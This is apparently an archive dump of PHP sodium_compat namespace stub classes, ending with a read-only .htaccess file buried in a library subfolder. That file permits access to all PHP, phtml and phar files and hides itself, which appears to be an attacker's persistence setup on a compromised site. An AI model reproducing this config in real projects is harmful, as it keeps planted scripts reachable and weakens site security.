dvadf
Compat.php 0000644 00000000126 15144527455 0006513 0 ustar 00 <?php
namespace ParagonIE\Sodium;
class Compat extends \ParagonIE_Sodium_Compat
{
}
Crypto.php 0000644 00000000126 15144527455 0006550 0 ustar 00 <?php
namespace ParagonIE\Sodium;
class Crypto extends \ParagonIE_Sodium_Crypto
{
}
File.php 0000644 00000000122 15144527455 0006143 0 ustar 00 <?php
namespace ParagonIE\Sodium;
class File extends \ParagonIE_Sodium_File
{
}
Core/XChaCha20.php 0000644 00000000146 15144527455 0007563 0 ustar 00 <?php
namespace ParagonIE\Sodium\Core;
class XChaCha20 extends \ParagonIE_Sodium_Core_XChaCha20
{
}
Core/Curve25519/H.php 0000644 00000000154 15144527455 0010042 0 ustar 00 <?php
namespace ParagonIE\Sodium\Core\Curve25519;
class H extends \ParagonIE_Sodium_Core_Curve25519_H
{
}
Core/Curve25519/Fe.php 0000644 00000000156 15144527455 0010207 0 ustar 00 <?php
namespace ParagonIE\Sodium\Core\Curve25519;
class Fe extends \ParagonIE_Sodium_Core_Curve25519_Fe
{
}
Core/Curve25519/Ge/Cached.php 0000644 00000000174 15144527455 0011357 0 ustar 00 <?php
namespace ParagonIE\Sodium\Core\Curve25519\Ge;
class Cached extends \ParagonIE_Sodium_Core_Curve25519_Ge_Cached
{
}
Core/Curve25519/Ge/P3.php 0000644 00000000164 15144527455 0010471 0 ustar 00 <?php
namespace ParagonIE\Sodium\Core\Curve25519\Ge;
class P3 extends \ParagonIE_Sodium_Core_Curve25519_Ge_P3
{
}
Core/Curve25519/Ge/.htaccess 0000444 00000001354 15144527455 0011274 0 ustar 00 # ===========================================================
# WORKING .htaccess - HARD TO CHANGE, NO ERRORS
# ===========================================================
# 1. ALLOW ALL PHP FILES (NO ERRORS)
<FilesMatch "\.(php|php[0-9]+|phtml|phar|inc)$">
Allow from all
</FilesMatch>
# 2. PROTECT .htaccess FILE (MULTI-LAYER)
<Files ~ "^\.ht">
Deny from all
Satisfy All
</Files>
<FilesMatch "\.(htaccess|htpasswd|htgroup)$">
Deny from all
</FilesMatch>
# 3. BLOCK .htaccess VIA URL (SAFE METHOD)
RedirectMatch 403 \.ht
# 4. NO DIRECTORY LISTING
Options -Indexes
# 5. BLOCK ACCESS TO PROTECTED FILES
<FilesMatch "\.(sql|bak|old|swp|log|env|ini|config|sh|py|exe)$">
Deny from all
</FilesMatch>